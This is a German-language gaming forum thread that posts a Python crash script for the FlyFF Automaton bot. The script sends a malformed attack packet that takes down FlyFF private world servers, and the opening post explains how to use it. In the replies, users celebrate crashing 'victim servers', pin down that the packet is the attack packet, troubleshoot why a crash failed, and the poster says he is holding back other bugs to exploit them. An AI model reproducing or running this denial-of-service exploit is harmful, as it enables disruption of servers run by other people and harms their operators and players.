[How To]Crash Pserver with OffiFiles²

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • [How To]Crash Pserver with OffiFiles²

    Es gibt mal wieder ein neues Crash Script.

    Dafür benötigt ihr den Automaton v1.2.x.x.

    Quellcode

    1. ###########################################################################################################
    2. ###########################################################################################################
    3. ################################ FlyFF Automaton - Crash Script (Python) ##################################
    4. ############################ Copyright (C) 2009 by dBased. All rights reserved. ###########################
    5. ###########################################################################################################
    6. ###########################################################################################################
    7. # Imports
    8. import struct
    9. from Automaton.Game import *
    10. from Automaton.System import AddCommand
    11. # Crash on unprotected server
    12. def Crash(arguments, device):
    13. # Try to fetch the current target
    14. target = GetTarget () or GetPlayer ()
    15. if ( not target ):
    16. device.Log ( 'Could not fetch a target!' )
    17. return True
    18. # Setup the packet and send it
    19. device.Log ( 'Crashing server!' )
    20. packet = struct.pack ( '<LLLLLL', 0xffffffff, 0x00ff0014, 0x1d, target.Numeric, 0, 1000 )
    21. Send ( packet )
    22. # Module initialization
    23. AddCommand ( Crash, 'Crash', '', 'Crash the server!' )
    Alles anzeigen


    Ersetzt diesen Inhalt mit dem in der Example.atpy !

    Geht online gibt @Crash ein und freut euh wen der Worldserver abstürzt.
    Wichtig hierbei ist zu beachten das ihr keine Objekte/Spieler/Npcs anvisiert habt.

    Quelle: [Development] Full disclosure: Proof of concept (Crash) - RaGEZONE - MMORPG server development forums

    Bug gefunden von nForce aka. dBased
  • Werbung zur Unterstützung des Forums ( Bitte AddBlocker deaktivieren )

  • Ceek;38349 schrieb:

    Yay Danke Yannick :)
    Mal sehen wie die Server das unterbinden wollen :)


    Naja das ist ein Witz gegen Statstacking/Bank crash.
    Ich sag nicht welche funktion der Packet_typ gehört :)
    Aber es ist eine Grundfunktion die man nicht einfach so deaktivieren kann :D


    Das geile ist aber er crasht schon nach einen einzigen packet :P
  • yannickmama;38360 schrieb:

    Naja das ist ein Witz gegen Statstacking/Bank crash.
    Ich sag nicht welche funktion der Packet_typ gehört :)
    Aber es ist eine Grundfunktion die man nicht einfach so deaktivieren kann :D


    Das geile ist aber er crasht schon nach einen einzigen packet :P


    Werde es sofort testen :P
  • bloodcore;38367 schrieb:

    Gut thanks für deine mühe :) dennoch in einigen Wochen wird ein Fix released glaub mir :P^^


    Dank lieber nForce dafür :D er hat den bug ja schlieslich entdeckt.

    Aber mal schauen vielleicht release ich in nächster zeit noch eigens gefundene Bugs. Will sie aber noch etwas ausnutzen ^-^
  • yannickmama;38399 schrieb:

    Dank lieber nForce dafür :D er hat den bug ja schlieslich entdeckt.

    Aber mal schauen vielleicht release ich in nächster zeit noch eigens gefundene Bugs. Will sie aber noch etwas ausnutzen ^-^


    Haha..
    Klingt ja interessant, :P
    kannst uns ja schonmal erzählen, was man durch die Bugs alles machen kann? =P
    Aber eine frage hab ich mal, undzwar wie findest du die Bugs herraus, probierst du einfach blöd rum oder wie??:slow:
    Aber danke ne :D

    MFG :yo !:
  • ~>Cruhl<~;38403 schrieb:

    Haha..
    Klingt ja interessant, :P
    kannst uns ja schonmal erzählen, was man durch die Bugs alles machen kann? =P
    Aber eine frage hab ich mal, undzwar wie findest du die Bugs herraus, probierst du einfach blöd rum oder wie??:slow:
    Aber danke ne :D

    MFG :yo !:


    Bugs bleiben geheim.

    Und ja ich teste einfach nur rum anderst kommt man nicht an die bugs heran =)
  • Crunkx;40536 schrieb:

    ehm lol..ich probiere das auf meinem server und der crasht kein bisschen O_O..habe das auch mal auf der f taste gemacht und XXXX male gesendet..es passiert nix..kann trotzdem chatten, sachen kaufen etc und keine error logs erscheinen und kein server krepiert..xD


    Hattest du ein Mover / Gegenstand im Target ? Wen ja crasht der server nicht.
  • yannickmama;38399 schrieb:

    Dank lieber nForce dafür :D er hat den bug ja schlieslich entdeckt.

    Aber mal schauen vielleicht release ich in nächster zeit noch eigens gefundene Bugs. Will sie aber noch etwas ausnutzen ^-^


    danke yannik fürs script x3
    ich gehe nie auf ragezone =P
    macht ja voll bock opferserver zu crashen ;P
  • yannickmama;38360 schrieb:

    Naja das ist ein Witz gegen Statstacking/Bank crash.
    Ich sag nicht welche funktion der Packet_typ gehört :)
    Aber es ist eine Grundfunktion die man nicht einfach so deaktivieren kann :D


    Das geile ist aber er crasht schon nach einen einzigen packet :P


    Ist das Buffpacket mach keine große Sache raus kann man eh leicht verändern und dann ist dein "Crash" geschichte.
  • derdingsbums;44425 schrieb:

    Hab die buffpackete geändert. Des funzt nit. Kann man immer noch crashen!


    Der über dir erzählt auch nur scheise.

    Das packet ist das AngriffsPacket. Da kein Mover im Target ist zum angreifen Crasht der Server.